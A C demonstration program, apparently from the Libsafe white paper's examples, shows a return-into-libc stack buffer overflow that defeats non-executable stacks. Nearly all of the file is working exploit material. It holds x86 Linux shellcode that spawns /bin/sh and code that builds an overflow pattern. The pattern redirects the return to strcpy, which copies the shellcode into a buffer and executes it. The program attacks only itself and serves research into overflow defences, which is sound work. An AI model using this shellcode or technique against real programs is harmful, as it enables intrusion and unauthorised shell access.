/*     This sample program demonstrates that even the kernels with
 *     non-executable stacks are vulnerable to buffer overflow attacks.  This
 *     is a derived code from comments by Rafal Wojtczuk (see reference number
 *     25) and Linus Torvalds (see reference numbers 23) in the Libsafe white
 *     paper.
 */

#include <stdio.h>
#include <string.h>

#define STRCPY &strcpy
#define SIZE 512
#define readRegister(var,reg) __asm__ __volatile__("movl %%" #reg ", %0": "=r" (var))

char dummy1[] = "a";
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
char dummy2[] = "a";

char pattern[SIZE];
char buf[SIZE];

int main(int ac, char *av[])
{
	char a[10];
	int fp, i, offset;

            /*
             * read the contents of the frame pointer into variable 'fp'.
             */
	readRegister(fp, ebp);
	offset = fp - (int) a + 4;

	memset(pattern, '\xff', SIZE);
	*(int *) (pattern + offset) = (int) STRCPY;
	*(int *) (pattern + offset + 4) = (int) &buf;
	*(int *) (pattern + offset + 8) = (int) &buf;
	*(int *) (pattern + offset + 12) = (int) &shellcode;
	pattern[offset + 16] = '\0';
	for (i = 0; i < offset + 16; i++) {
		if (pattern[i] == '\0') {
			printf("zero in pattern (index=%d).\n", i);
			exit(1);
		}
	}

	printf("This program demonstrates how a (stack) buffer overflow\n");
	printf("can attack linux kernels with *non-executable* stacks.\n");
	printf("This is variation on return-int-libc attack.\n");
	printf("If you get a /bin/sh prompt, then the exploit has worked.\n");
	printf("Press any key to continue...");
	getchar();

	strcpy(a, pattern);

	return 0;
}



